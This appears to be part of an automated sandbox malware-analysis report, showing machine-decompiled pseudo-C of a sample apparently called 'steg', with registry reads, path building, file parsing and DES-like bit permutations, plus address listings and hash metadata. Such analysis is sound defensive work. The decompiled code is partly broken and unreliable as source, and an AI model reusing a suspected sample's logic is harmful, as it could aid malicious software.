				unsigned int _t173;
				unsigned int _t176;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t180;
				unsigned int _t181;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr* _t186;
				void* _t192;
				intOrPtr _t196;
				unsigned int _t198;
				intOrPtr _t205;
				signed int _t206;
				intOrPtr _t207;
				intOrPtr _t208;
				signed int _t212;
				void* _t214;
				void* _t215;
				char* _t217;
				void* _t219;
				void* _t224;
				void* _t225;

				_t205 = _a4;
				_t173 = 0;
				_a4 =  *((intOrPtr*)(_t205 + 0x3c));
				_t214 =  ==  ? 4 : 0;
				_v28 = 0;
				_v16 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(_t205 + 4)) == 0) {
					_a32 = 0;
					_a28 = 0;
				} else {
					asm("cdq");
					_t172 = E00FCDC27(_t205, _a8 + _t214, _a32 + _a28, __edx);
					_t224 = _t224 + 0xc;
					_t214 = _t214 + _t172;
				}
				_v8 = _a16;
				_t215 = _t214 + E00FCDC27(_t205, _a8 + _t214, _a16, _a20);
				E00FBBD27(_t205, _a8,  &_v64);
				_t176 = _a28;
				_t124 = _a32 + _t176;
				_t225 = _t224 + 0x18;
				_a32 = _t124;
				if( *((intOrPtr*)(_t205 + 2)) == _t173) {
					__eflags = _a20 - _t173;
					if(__eflags > 0) {
						L44:
						return 0xb;
					}
					_t196 = _a16;
					if(__eflags >= 0) {
						__eflags = _t196 - 0x7fffffff;
						if(_t196 > 0x7fffffff) {
							goto L44;
						}
					}
					_t177 = _a12;
					_v12 = _t177;
					__eflags = _t177;
					if(_t177 == 0) {
						goto L44;
					} else {
						_t126 = _t124 + _t196;
						__eflags = _t126;
						_a32 = _t126;
					}
				} else {
					_v12 = _a24;
					_v8 = _t176;
					_a28 = _t173;
				}
				_t206 = _v38 & 0x0000ffff;
				 *_a36 = _v34 & 0x0000ffff;
				_t179 = _a8;
				_t128 = _t215 + _t179;
				_t217 = (_v36 & 0x0000ffff) + _t179;
				_t180 = _a32;
				_a8 = _t215 + _t179;
				_v24 = _t217;
				if(_t180 <= 0) {
					L43:
					__eflags = 0;
					return 0;
				} else {
					L11:
					while(1) {
						if(_t206 != 0) {
							L30:
							_t181 = _v8;
							_t219 =  >  ? _t206 : _t180;
							if(_t181 <= 0) {
								E00FE7C87(_t128, 0, _t219);
							} else {
								_t219 =  >  ? _t181 : _t219;
								E00FE7337(_t128, _v12, _t219);
							}
							_v12 = _v12 + _t219;
							_t198 = _v8 - _t219;
							_t180 = _a32 - _t219;
							_t128 = _a8 + _t219;
							_t225 = _t225 + 0xc;
							_t206 = _t206 - _t219;
							_a32 = _t180;
							_a8 = _a8 + _t219;
							_v8 = _t198;
							if(_t198 == 0) {
								_v8 = _a28;
								_v12 = _a24;
								_t180 = _a32;
							}
							if(_t180 <= 0) {
								_t183 = _v16;
								__eflags = _t183;
								if(_t183 != 0) {
									_t132 =  *((intOrPtr*)(_t183 + 0x44));
									__eflags = _t132;
									if(_t132 != 0) {
										E00FCBA77(_t132);
										E00FAEEB7( *((intOrPtr*)(_t132 + 0x10)));
									}
								}
								goto L43;
							} else {
								_t217 = _v24;
								continue;
							}
						} else {
							_t207 = _a4;
							_v32 = _t173;
							if( *((char*)(_t207 + 0x12)) != 0) {
								_t212 = (0x66666667 * ( *(_t207 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + (0x66666667 * ( *(_t207 + 0x16) & 0x0000ffff) >> 0x20 >> 1) + 1;
								asm("cdq");
								_t56 =  *0x4818d4 / ( *(_a4 + 0x14) & 0x0000ffff) + 1; // 0x4818d5
								_t192 = _t56;
								do {
									_t173 = _t173 + 1;
									_t57 = _t173 - 2; // -1
									_t166 = _t57 / _t212 * _t212 + 2;
									if(_t166 == _t192) {
										_t166 = _t166 + 1;
									}
								} while (_t166 == _t173 || _t173 == _t192);
								_t207 = _a4;
								_v20 = _t173;
							}
							_t138 = E00F9B2E7(_t207,  &_v28,  &_v20, _t173, 0);
							_t173 = _v20;
							_t225 = _t225 + 0x14;
							_t208 = _v28;
							_a8 = _t138;
							if( *((char*)(_t207 + 0x12)) == 0) {
								L25:
								if(_t138 != 0) {
									goto L37;
								} else {
									goto L26;
								}
							} else {
								if(_t138 != 0) {
									L37:
									_t184 = _v16;
									__eflags = _t184;
									if(_t184 == 0) {
										L45:
										return _t138;
									} else {
										_t185 =  *((intOrPtr*)(_t184 + 0x44));
										__eflags = _t185;
										if(_t185 == 0) {
											goto L45;
										} else {
											E00FCBA77(_t185);
											E00FAEEB7( *((intOrPtr*)(_t185 + 0x10)));
											return _a8;
										}
									}
								} else {
									_t138 = E00FB16F7(_a4, _t173, (_v32 & 0xffffff00 | _v32 != 0x00000000) + 0x00000003 & 0x000000ff, _v32);
									_t225 = _t225 + 0x10;
									_a8 = _t138;
									if(_t138 == 0) {
										L26:
										 *_t217 = _t173 >> 0x18;
										 *((char*)(_t217 + 1)) = _t173 >> 0x10;
										 *((char*)(_t217 + 2)) = _t173 >> 8;
										_t148 = _v16;
										 *(_t217 + 3) = _t173;
										if(_t148 != 0) {
											_t150 =  *((intOrPtr*)(_t148 + 0x44));
											if( *((intOrPtr*)(_t148 + 0x44)) != 0) {
												E00FCBA77(_t150);
												E00FAEEB7( *((intOrPtr*)(_t150 + 0x10)));
												_t225 = _t225 + 8;
											}
										}
										_t186 =  *((intOrPtr*)(_t208 + 0x40));
										_v24 = _t186;
										 *_t186 = 0;
										_v16 = _t208;
										_t180 = _a32;
										_t128 =  *((intOrPtr*)(_t208 + 0x40)) + 4;
										_a8 =  *((intOrPtr*)(_t208 + 0x40)) + 4;
										_t206 = ( *(_a4 + 0x16) & 0x0000ffff) - 4;
										goto L30;
									} else {
										if(_t208 != 0) {
											_t188 =  *((intOrPtr*)(_t208 + 0x44));
											if( *((intOrPtr*)(_t208 + 0x44)) != 0) {
												E00FCBA77(_t188);
												E00FAEEB7( *((intOrPtr*)(_t188 + 0x10)));
												_t217 = _v24;
												_t138 = _a8;
												_t225 = _t225 + 8;
											}
										}
										goto L25;
									}
								}
							}
						}
						goto L46;
					}
				}
				L46:
			}














































                                                                                                                    0x00fa6d40
                                                                                                                    0x00fa6d48
                                                                                                                    0x00fa6d4f
                                                                                                                    0x00fa6d57
                                                                                                                    0x00fa6d5a
                                                                                                                    0x00fa6d61
                                                                                                                    0x00fa6d64
                                                                                                                    0x00fa6d6a
                                                                                                                    0x00fa6d87
                                                                                                                    0x00fa6d8a
                                                                                                                    0x00fa6d6c
                                                                                                                    0x00fa6d72
                                                                                                                    0x00fa6d7b
                                                                                                                    0x00fa6d80
                                                                                                                    0x00fa6d83
                                                                                                                    0x00fa6d83
                                                                                                                    0x00fa6d9a
                                                                                                                    0x00fa6da2
                                                                                                                    0x00fa6dac
                                                                                                                    0x00fa6db4
                                                                                                                    0x00fa6db7
                                                                                                                    0x00fa6db9
                                                                                                                    0x00fa6dbc
                                                                                                                    0x00fa6dc2
                                                                                                                    0x00fa6dd2
                                                                                                                    0x00fa6dd5
                                                                                                                    0x00fa7019
                                                                                                                    0x00000000
                                                                                                                    0x00fa7019
                                                                                                                    0x00fa6ddb
                                                                                                                    0x00fa6dde
                                                                                                                    0x00fa6de0
                                                                                                                    0x00fa6de6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa6de6
                                                                                                                    0x00fa6dec
                                                                                                                    0x00fa6def
                                                                                                                    0x00fa6df2
                                                                                                                    0x00fa6df4
                                                                                                                    0x00000000
                                                                                                                    0x00fa6dfa
                                                                                                                    0x00fa6dfa
                                                                                                                    0x00fa6dfa
                                                                                                                    0x00fa6dfc
                                                                                                                    0x00fa6dfc
                                                                                                                    0x00fa6dc4
                                                                                                                    0x00fa6dc7
                                                                                                                    0x00fa6dca
                                                                                                                    0x00fa6dcd
                                                                                                                    0x00fa6dcd
                                                                                                                    0x00fa6e06
                                                                                                                    0x00fa6e0a
                                                                                                                    0x00fa6e0c
                                                                                                                    0x00fa6e0f
                                                                                                                    0x00fa6e16
                                                                                                                    0x00fa6e18
                                                                                                                    0x00fa6e1b
                                                                                                                    0x00fa6e1e
                                                                                                                    0x00fa6e23
                                                                                                                    0x00fa7012
                                                                                                                    0x00fa7012
                                                                                                                    0x00fa7018
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa6e29
                                                                                                                    0x00fa6e2b
                                                                                                                    0x00fa6f5f
                                                                                                                    0x00fa6f63
                                                                                                                    0x00fa6f66
                                                                                                                    0x00fa6f6b
                                                                                                                    0x00fa6f82
                                                                                                                    0x00fa6f6d
                                                                                                                    0x00fa6f6f
                                                                                                                    0x00fa6f77
                                                                                                                    0x00fa6f77
                                                                                                                    0x00fa6f90
                                                                                                                    0x00fa6f93
                                                                                                                    0x00fa6f95
                                                                                                                    0x00fa6f97
                                                                                                                    0x00fa6f99
                                                                                                                    0x00fa6f9c
                                                                                                                    0x00fa6f9e
                                                                                                                    0x00fa6fa1
                                                                                                                    0x00fa6fa4
                                                                                                                    0x00fa6fa9
                                                                                                                    0x00fa6fae
                                                                                                                    0x00fa6fb4
                                                                                                                    0x00fa6fb7
                                                                                                                    0x00fa6fb7
                                                                                                                    0x00fa6fbc
                                                                                                                    0x00fa6ff0
                                                                                                                    0x00fa6ff3
                                                                                                                    0x00fa6ff5
                                                                                                                    0x00fa6ff7
                                                                                                                    0x00fa6ffa
                                                                                                                    0x00fa6ffc
                                                                                                                    0x00fa7002
                                                                                                                    0x00fa7008
                                                                                                                    0x00fa700d
                                                                                                                    0x00fa6ffc
                                                                                                                    0x00000000
                                                                                                                    0x00fa6fbe
                                                                                                                    0x00fa6fbe
                                                                                                                    0x00000000
                                                                                                                    0x00fa6fbe
                                                                                                                    0x00fa6e31
                                                                                                                    0x00fa6e31
                                                                                                                    0x00fa6e34
                                                                                                                    0x00fa6e3b
                                                                                                                    0x00fa6e5c
                                                                                                                    0x00fa6e5e
                                                                                                                    0x00fa6e61
                                                                                                                    0x00fa6e61
                                                                                                                    0x00fa6e67
                                                                                                                    0x00fa6e67
                                                                                                                    0x00fa6e6a
                                                                                                                    0x00fa6e72
                                                                                                                    0x00fa6e77
                                                                                                                    0x00fa6e79
                                                                                                                    0x00fa6e79
                                                                                                                    0x00fa6e7a
                                                                                                                    0x00fa6e82
                                                                                                                    0x00fa6e85
                                                                                                                    0x00fa6e85
                                                                                                                    0x00fa6e94
                                                                                                                    0x00fa6e99
                                                                                                                    0x00fa6e9c
                                                                                                                    0x00fa6ea3
                                                                                                                    0x00fa6ea6
                                                                                                                    0x00fa6ea9
                                                                                                                    0x00fa6ef8
                                                                                                                    0x00fa6efa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fa6eab
                                                                                                                    0x00fa6ead
                                                                                                                    0x00fa6fc6
                                                                                                                    0x00fa6fc6
                                                                                                                    0x00fa6fc9
                                                                                                                    0x00fa6fcb
                                                                                                                    0x00fa7024
                                                                                                                    0x00fa7024
                                                                                                                    0x00fa6fcd
                                                                                                                    0x00fa6fcd
                                                                                                                    0x00fa6fd0
                                                                                                                    0x00fa6fd2
                                                                                                                    0x00000000
                                                                                                                    0x00fa6fd4
                                                                                                                    0x00fa6fd8
                                                                                                                    0x00fa6fde
                                                                                                                    0x00fa6fef
                                                                                                                    0x00fa6fef
                                                                                                                    0x00fa6fd2
                                                                                                                    0x00fa6eb3
                                                                                                                    0x00fa6ec6
                                                                                                                    0x00fa6ecb
                                                                                                                    0x00fa6ece
                                                                                                                    0x00fa6ed3
                                                                                                                    0x00fa6f00
                                                                                                                    0x00fa6f05
                                                                                                                    0x00fa6f0c
                                                                                                                    0x00fa6f14
                                                                                                                    0x00fa6f17
                                                                                                                    0x00fa6f1a
                                                                                                                    0x00fa6f1f
                                                                                                                    0x00fa6f21
                                                                                                                    0x00fa6f26
                                                                                                                    0x00fa6f2c
                                                                                                                    0x00fa6f32
                                                                                                                    0x00fa6f37
                                                                                                                    0x00fa6f37
                                                                                                                    0x00fa6f26
                                                                                                                    0x00fa6f3a
                                                                                                                    0x00fa6f3d
                                                                                                                    0x00fa6f40
                                                                                                                    0x00fa6f4c
                                                                                                                    0x00fa6f53
                                                                                                                    0x00fa6f56
                                                                                                                    0x00fa6f59
                                                                                                                    0x00fa6f5c
                                                                                                                    0x00000000
                                                                                                                    0x00fa6ed5
                                                                                                                    0x00fa6ed7
                                                                                                                    0x00fa6ed9
                                                                                                                    0x00fa6ede
                                                                                                                    0x00fa6ee4
                                                                                                                    0x00fa6eea
                                                                                                                    0x00fa6eef
                                                                                                                    0x00fa6ef2
                                                                                                                    0x00fa6ef5
                                                                                                                    0x00fa6ef5
                                                                                                                    0x00fa6ede
                                                                                                                    0x00000000
                                                                                                                    0x00fa6ed7
                                                                                                                    0x00fa6ed3
                                                                                                                    0x00fa6ead
                                                                                                                    0x00fa6ea9
                                                                                                                    0x00000000
                                                                                                                    0x00fa6e2b
                                                                                                                    0x00fa6e29
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_memset
                                                                                                                    • String ID: gfff
                                                                                                                    • API String ID: 3555123492-1553575800
                                                                                                                    • Opcode ID: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction ID: 2de965b012f744bcc62dc814935ba2f1aa069773f1de598cd0b13e12399ef581
                                                                                                                    • Opcode Fuzzy Hash: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction Fuzzy Hash: 2FA1AEB1A00209ABCB18DF59D881AAEBBB5EF49314F19816DFC18EB341D735ED10DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8F577 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E00F8F577(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v267;
				void _v268;
				char _v272;
				char _v528;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				intOrPtr _v844;
				signed int _v856;
				char _v1048;
				char _v1115;
				char _v1116;
				char _v1372;
				char _v2072;
				signed int _v2076;
				intOrPtr _v2932;
				intOrPtr _v2936;
				intOrPtr _v2940;
				signed int* _v2944;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t89;
				void* _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t104;
				void* _t105;
				char* _t115;
				signed int _t118;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int _t145;
				char _t146;
				signed int _t151;
				signed int _t156;
				signed int _t161;
				signed int _t166;
				signed int _t178;
				signed int _t183;
				signed int _t188;
				signed int _t193;
				signed int _t196;
				intOrPtr* _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t204;
				signed int _t214;
				signed int _t218;
				intOrPtr _t220;
				void* _t222;
				intOrPtr* _t223;
				intOrPtr* _t226;
				intOrPtr* _t228;
				intOrPtr* _t236;
				void* _t238;
				signed int _t242;
				signed int _t246;
				signed int _t248;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t253;
				int _t255;
				void* _t257;
				signed int _t258;
				void* _t259;
				void* _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t271;
				intOrPtr* _t272;
				void* _t273;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t279;
				signed int* _t280;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				void* _t303;
				intOrPtr* _t304;
				void* _t306;
				signed int _t307;
				signed int _t308;
				void* _t310;
				void* _t311;
				signed int _t312;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t325;

				_v8 =  *0x481f80 ^ _t307;
				_v268 = 0;
				E00FE7C87( &_v267, 0, 0x103);
				_t311 = _t310 + 0xc;
				_v788 = 0x104;
				_t89 =  &_v780;
				if(_a4 != 0xf) {
					_push(0x470fa8);
				} else {
					_push(0x470f60);
				}
				_push(0x200);
				_push(_t89);
				E00FE7AF9();
				_t312 = _t311 + 0xc;
				_push( &_v784);
				_push(0x20019);
				_push(0);
				_push( &_v780);
				_push(0x80000002);
				if( *0x470028() != 0) {
					L25:
					__eflags = 0;
					return E00FE72F2(0, _t222, _v8 ^ _t307, _t257, _t274, _t286);
				} else {
					_t99 =  *0x470024(_v784, 0, 0,  &_v792,  &_v268,  &_v788);
					if(_t99 != 0 || _v788 <= _t99 || _v268 == _t99) {
						 *0x47002c(_v784);
						goto L25;
					} else {
						 *0x47002c(_v784, _t274, _t286);
						if(_v268 == 0x22) {
							_t253 =  &_v268;
							_t18 = _t253 + 1; // 0x23
							_t273 = _t18;
							do {
								_t220 =  *_t253;
								_t253 = _t253 + 1;
							} while (_t220 != 0);
							_t255 = _t253 - _t273 - 1;
							if(_t255 > 0) {
								_t286 =  &_v267;
								memcpy( &_v268, _t286, _t255);
								_t312 = _t312 + 0xc;
								_t274 = _t286 + _t255 + _t255;
							}
						}
						_t226 =  &_v268;
						_t22 = _t226 + 1; // 0x23
						_t258 = _t22;
						do {
							_t102 =  *_t226;
							_t226 = _t226 + 1;
						} while (_t102 != 0);
						_t23 = _t226 - _t258 - 1; // 0x22
						_t103 = _t23;
						if(_t103 <= 0) {
							L17:
							_t228 =  &_v268;
							_t27 = _t228 + 1; // 0x1
							_t259 = _t27;
							do {
								_t104 =  *_t228;
								_t228 = _t228 + 1;
							} while (_t104 != 0);
							_t28 = _t228 - _t259 + 1; // 0x2
							_t275 = _t28;
							_t105 = E00FE7BCE(_t222, _t28, _t28);
							_t287 = _t105;
							if(_t105 != 0) {
								E00FE7AF9(_t287, _t275,  &_v268);
							}
							_pop(_t276);
							_pop(_t288);
							return E00FE72F2(_t287, _t222, _v8 ^ _t307, _t259, _t276, _t288);
						} else {
							while( *((char*)(_t307 + _t103 - 0x108)) != 0x5c) {
								_t103 = _t103 - 1;
								if(_t103 > 0) {
									continue;
								} else {
									goto L17;
								}
								goto L60;
							}
							__eflags = _t103 - 0x104;
							if(_t103 >= 0x104) {
								E00FE7EEC();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t307);
								_t308 = _t312;
								_v856 =  *0x481f80 ^ _t308;
								_push(_t286);
								_push(_t274);
								_v1116 = 0;
								E00FE7C87( &_v1115, 0, 0x103);
								_t316 = _t312 - 0x814 + 0xc;
								_t277 = 0;
								_t289 = 0;
								__eflags = _v844 - 0xf;
								_t115 =  &_v1372;
								if(_v844 != 0xf) {
									_push(0x471000);
								} else {
									_push(0x470fec);
								}
								E00FE7AF9();
								_t317 = _t316 + 0xc;
								_t118 =  *0x470200(0, 0x1a, 0, 0,  &_v272, _t115, 0x100);
								__eflags = _t118;
								if(_t118 == 0) {
									E00FE7AF9( &_v1048, 0x208,  &_v272);
									E00FE7B4E( &_v1048, 0x208, 0x470790);
									E00FE7B4E( &_v1048, 0x208,  &_v528);
									E00FE7B4E( &_v1048, 0x208, 0x471010);
									_v2076 = _t289;
									_t131 = E00FE928A( &_v2076,  &_v1048, 0x470890);
									_t318 = _t317 + 0x3c;
									__eflags = _t131;
									if(_t131 != 0) {
										goto L32;
									} else {
										_t134 = _v2076;
										__eflags = _t134;
										if(__eflags == 0) {
											goto L32;
										} else {
											_push(_t134);
											_push(0x400);
											_push( &_v2072);
											_t136 = E00FE9087(_t222, _t277, _t289, __eflags);
											_t319 = _t318 + 0xc;
											__eflags = _t136;
											if(__eflags == 0) {
												L57:
												_push(_v2076);
												E00FE9010(_t222, _t277, _t289, __eflags);
												_pop(_t279);
												__eflags = _v12 ^ _t308;
												_pop(_t291);
												return E00FE72F2(_t277, _t222, _v12 ^ _t308, _t258, _t279, _t291);
											} else {
												do {
													E00FE8317( &_v2072, 0x400);
													_t321 = _t319 + 8;
													__eflags = _t289;
													if(_t289 != 0) {
														_t143 = E00FE8487( &_v2072, 0x471030);
														_t322 = _t321 + 8;
														__eflags = _t143;
														if(__eflags != 0) {
															_t145 = E00FE8487( &_v2072, 0x471038);
															_t323 = _t322 + 8;
															__eflags = _t145;
															if(_t145 != 0) {
																 *_t145 = 0x5c;
															}
															_t236 =  &_v2072;
															_t260 = _t236 + 1;
															do {
																_t146 =  *_t236;
																_t236 = _t236 + 1;
																__eflags = _t146;
															} while (_t146 != 0);
															_t238 = _t236 - _t260 - 1;
															__eflags = _t238 - 0x400;
															if(_t238 >= 0x400) {
																E00FE7EEC();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t308);
																_push(_t289);
																_push(_t277);
																_t280 = _v2944;
																_t292 = _t280[1];
																_t261 =  *_t280;
																_t151 = (_t292 >> 0x00000004 ^ _t261) & 0x0f0f0f0f;
																_t262 = _t261 ^ _t151;
																_t293 = _t292 ^ _t151 << 0x00000004;
																_t156 = (_t262 >> 0x00000010 ^ _t293) & 0x0000ffff;
																_t294 = _t293 ^ _t156;
																_t263 = _t262 ^ _t156 << 0x00000010;
																_t161 = (_t294 >> 0x00000002 ^ _t263) & 0x33333333;
																_t264 = _t263 ^ _t161;
																_t295 = _t294 ^ _t161 << 0x00000002;
																_t166 = (_t264 >> 0x00000008 ^ _t295) & 0x00ff00ff;
																_t296 = _t295 ^ _t166;
																_t265 = _t264 ^ _t166 << 0x00000008;
																_t242 = (_t296 >> 0x00000001 ^ _t265) & 0x55555555;
																 *_t280 = _t242 ^ _t265;
																_t280[1] = _t242 + _t242 ^ _t296;
																E00F8FFF7(_t280, _v2932, 0);
																E00F8FFF7(_t280, _v2936, 1);
																E00F8FFF7(_t280, _v2940, 0);
																_t297 = _t280[1];
																_t266 =  *_t280;
																_t178 = (_t297 >> 0x00000001 ^ _t266) & 0x55555555;
																_t267 = _t266 ^ _t178;
																_t298 = _t297 ^ _t178 + _t178;
																_t183 = (_t267 >> 0x00000008 ^ _t298) & 0x00ff00ff;
																_t299 = _t298 ^ _t183;
																_t268 = _t267 ^ _t183 << 0x00000008;
																_t188 = (_t299 >> 0x00000002 ^ _t268) & 0x33333333;
																_t269 = _t268 ^ _t188;
																_t300 = _t299 ^ _t188 << 0x00000002;
																_t193 = (_t269 >> 0x00000010 ^ _t300) & 0x0000ffff;
																_t301 = _t300 ^ _t193;
																_t270 = _t269 ^ _t193 << 0x00000010;
																_t246 = (_t301 >> 0x00000004 ^ _t270) & 0x0f0f0f0f;
																_t196 = _t246 ^ _t270;
																_t248 = _t246 << 0x00000004 ^ _t301;
																__eflags = _t248;
																 *_t280 = _t196;
																_t280[1] = _t248;
																return _t196;
															} else {
																_push(_t222);
																 *((char*)(_t308 + _t238 - 0x810)) = _t146;
																_t198 = E00FE8487( &_v2072, 0x47103c);
																_t249 =  &_v272;
																_t325 = _t323 + 8;
																_t223 = _t198;
																_t66 = _t249 + 1; // 0x1
																_t271 = _t66;
																do {
																	_t199 =  *_t249;
																	_t249 = _t249 + 1;
																	__eflags = _t199;
																} while (_t199 != 0);
																_t250 = _t249 - _t271;
																__eflags = _t250;
																_t272 =  &_v528;
																_t303 = _t272 + 1;
																do {
																	_t200 =  *_t272;
																	_t272 = _t272 + 1;
																	__eflags = _t200;
																} while (_t200 != 0);
																_t258 = _t272 - _t303;
																__eflags = _t258;
																_t304 = _t223;
																_t69 = _t304 + 1; // 0x1
																_t282 = _t69;
																do {
																	_t201 =  *_t304;
																	_t304 = _t304 + 1;
																	__eflags = _t201;
																} while (_t201 != 0);
																_t70 = _t250 + 3; // 0x4
																_t289 = _t304 - _t282 + _t70 + _t258;
																_t204 = E00FE7BCE(_t223, _t282, _t304 - _t282 + _t70 + _t258);
																_t277 = _t204;
																_t319 = _t325 + 4;
																__eflags = _t204;
																if(__eflags != 0) {
																	E00FE7AF9(_t277, _t289,  &_v272);
																	E00FE7B4E(_t277, _t289, 0x470790);
																	E00FE7B4E(_t277, _t289,  &_v528);
																	E00FE7B4E(_t277, _t289, 0x470790);
																	_t73 = _t223 + 1; // 0x1
																	E00FE7B4E(_t277, _t289, _t73);
																	_t319 = _t319 + 0x3c;
																}
																_pop(_t222);
																goto L57;
															}
														} else {
															goto L41;
														}
													} else {
														_t218 = E00FE8487( &_v2072, 0x471020);
														_t322 = _t321 + 8;
														__eflags = _t218;
														if(__eflags != 0) {
															_t289 = 1;
														}
														goto L41;
													}
													goto L60;
													L41:
													_push(_v2076);
													_push(0x400);
													_push( &_v2072);
													_t214 = E00FE9087(_t222, _t277, _t289, __eflags);
													_t319 = _t322 + 0xc;
													__eflags = _t214;
												} while (__eflags != 0);
												_push(_v2076);
												E00FE9010(_t222, _t277, _t289, __eflags);
												_pop(_t283);
												_pop(_t306);
												__eflags = _v12 ^ _t308;
												return E00FE72F2(_t277, _t222, _v12 ^ _t308, _t258, _t283, _t306);
											}
										}
									}
								} else {
									 *0x470124();
									L32:
									_pop(_t278);
									_pop(_t290);
									__eflags = _v12 ^ _t308;
									return E00FE72F2(0, _t222, _v12 ^ _t308, _t258, _t278, _t290);
								}
							} else {
								 *((char*)(_t307 + _t103 - 0x108)) = 0;
								goto L17;
							}
						}
					}
				}
				L60:
			}































































































































                                                                                                                    0x00f8f587
                                                                                                                    0x00f8f598
                                                                                                                    0x00f8f59f
                                                                                                                    0x00f8f5a4
                                                                                                                    0x00f8f5ab
                                                                                                                    0x00f8f5b5
                                                                                                                    0x00f8f5bb
                                                                                                                    0x00f8f5c4
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5bd
                                                                                                                    0x00f8f5c9
                                                                                                                    0x00f8f5ce
                                                                                                                    0x00f8f5cf
                                                                                                                    0x00f8f5d4
                                                                                                                    0x00f8f5dd
                                                                                                                    0x00f8f5de
                                                                                                                    0x00f8f5e3
                                                                                                                    0x00f8f5eb
                                                                                                                    0x00f8f5ec
                                                                                                                    0x00f8f5f9
                                                                                                                    0x00f8f712
                                                                                                                    0x00f8f717
                                                                                                                    0x00f8f721
                                                                                                                    0x00f8f5ff
                                                                                                                    0x00f8f61e
                                                                                                                    0x00f8f626
                                                                                                                    0x00f8f70c
                                                                                                                    0x00000000
                                                                                                                    0x00f8f644
                                                                                                                    0x00f8f64c
                                                                                                                    0x00f8f659
                                                                                                                    0x00f8f65b
                                                                                                                    0x00f8f661
                                                                                                                    0x00f8f661
                                                                                                                    0x00f8f667
                                                                                                                    0x00f8f667
                                                                                                                    0x00f8f669
                                                                                                                    0x00f8f66a
                                                                                                                    0x00f8f670
                                                                                                                    0x00f8f673
                                                                                                                    0x00f8f675
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f681
                                                                                                                    0x00f8f673
                                                                                                                    0x00f8f683
                                                                                                                    0x00f8f689
                                                                                                                    0x00f8f689
                                                                                                                    0x00f8f68c
                                                                                                                    0x00f8f68c
                                                                                                                    0x00f8f68e
                                                                                                                    0x00f8f68f
                                                                                                                    0x00f8f695
                                                                                                                    0x00f8f695
                                                                                                                    0x00f8f69a
                                                                                                                    0x00f8f6ab
                                                                                                                    0x00f8f6ab
                                                                                                                    0x00f8f6b1
                                                                                                                    0x00f8f6b1
                                                                                                                    0x00f8f6b7
                                                                                                                    0x00f8f6b7
                                                                                                                    0x00f8f6b9
                                                                                                                    0x00f8f6ba
                                                                                                                    0x00f8f6c0
                                                                                                                    0x00f8f6c0
                                                                                                                    0x00f8f6c4
                                                                                                                    0x00f8f6c9
                                                                                                                    0x00f8f6d0
                                                                                                                    0x00f8f6db
                                                                                                                    0x00f8f6e0
                                                                                                                    0x00f8f6e3
                                                                                                                    0x00f8f6e6
                                                                                                                    0x00f8f6f4
                                                                                                                    0x00f8f69c
                                                                                                                    0x00f8f69c
                                                                                                                    0x00f8f6a6
                                                                                                                    0x00f8f6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8f6a9
                                                                                                                    0x00f8f6f5
                                                                                                                    0x00f8f6fa
                                                                                                                    0x00f8f722
                                                                                                                    0x00f8f727
                                                                                                                    0x00f8f728
                                                                                                                    0x00f8f729
                                                                                                                    0x00f8f72a
                                                                                                                    0x00f8f72b
                                                                                                                    0x00f8f72c
                                                                                                                    0x00f8f72d
                                                                                                                    0x00f8f72e
                                                                                                                    0x00f8f72f
                                                                                                                    0x00f8f730
                                                                                                                    0x00f8f731
